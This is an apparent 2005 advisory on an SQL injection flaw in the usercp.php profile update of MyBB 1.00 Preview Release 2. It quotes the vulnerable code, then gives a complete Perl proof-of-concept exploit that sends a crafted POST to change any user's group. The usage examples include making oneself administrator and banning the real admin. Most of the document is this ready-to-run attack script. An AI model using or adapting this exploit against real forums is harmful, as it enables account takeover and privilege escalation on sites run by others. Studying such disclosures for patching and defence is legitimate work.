Vendor: www.mybboard.com Version: 1.00 Preview Release 2, RC4 and mayb prior. Script: usercp.php Code: > if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != > "no") > { > [...] > $returndate = > $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear']; > [...] > $newprofile = array( > "website" => > addslashes(htmlspecialchars($mybb->input['website'])), > "icq" => intval($mybb->input['icq']), > "aim" => addslashes(htmlspecialchars($mybb->input['aim'])), > "yahoo" => > addslashes(htmlspecialchars($mybb->input['yahoo'])), > "msn" => addslashes(htmlspecialchars($mybb->input['msn'])), > "birthday" => $bday, > "away" => $away, > "awaydate" => $awaydate, > "returndate" => $returndate, // <--- not checked (bday > too, but anyway) > "awayreason" => > addslashes(htmlspecialchars($mybb->input['awayreason'])) > ); > [...] > $db->update_query(TABLE_PREFIX."users", $newprofile, > "uid='".$mybb->user['uid']."'"); So: Attacker can replace "awayday" param by some SQL code and change any field in _users table. Changing "usergroup" for his "uid" to 4 makes him an admin. To use this bug attacker have to be a registered/awayting_activation user. Proof of concept: (For PR2 only) --<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->-- #!/usr/bin/perl ### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ### ### ------------------------------------------------ ### ### To use this you have to be registered member on ### ### a target. ### ### ------------------------------------------------ ### ### Glossary: ### ### [MYBBUSER] - name of the field in cookie; ### ### [YOUR_ID] - your uid :) ### ### [ID] - victim uid ### ### Available groups: ### ### 1 - Unregistered / Not Logged In ### ### 2 - Registered ### ### 3 - Super Moderators ### ### 4 - Administrators ### ### 5 - Awayting Activation ### ### 6 - Moderators ### ### 7 - Banned ### ### ------------------------------------------------ ### ### Examples: ### ### 1) TROUBLE --> U need an admin privileges. ### ### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ### ### [YOUR_ID] -g 4 server /mybb/ ### ### 2) TROUBLE --> U need to ban real admin. ### ### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ### ### [ID] -g 7 server /mybb/ ### use IO::Socket; $tmp=0; while($tmp<@ARGV) { if($ARGV[$tmp] eq "-u") { $mbuser=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-i") { $id=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-g") { $ugr=$ARGV[$tmp+1]; $tmp++; } if($ARGV[$tmp] eq "-h") { &f_help(); } $tmp++; } $target=$ARGV[@ARGV-2]; $path =$ARGV[@ARGV-1]; if(!$mbuser || !$id || !$ugr) { &f_die("Some options aren't specified"); } print "\r\n Attacking http://$target\r\n"; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target"); $str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile®submit=Update+Profile"; print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n"; while(<$sock>) { if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)} } print "\r\n Looks like exploit failed :[\r\n"; #----------------------------------# # S u B r O u T i N e # #----------------------------------# sub f_help() { print q( Usage: mybbpr2.pl SERVER PATH Options: -u USERKEY mybbuser field from cookie. -i UID User's uid. (Change group 4 this user) -g GROUP New usergroup. (1-7) -h Displays this help. ); exit(-1); } #' sub f_die($) { print "\r\nERROR: $_[0]\r\n"; exit(-1); } --<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->-- Found: 1-3 sept 2005. Don't remember. Updated package is available (i hope). ByE.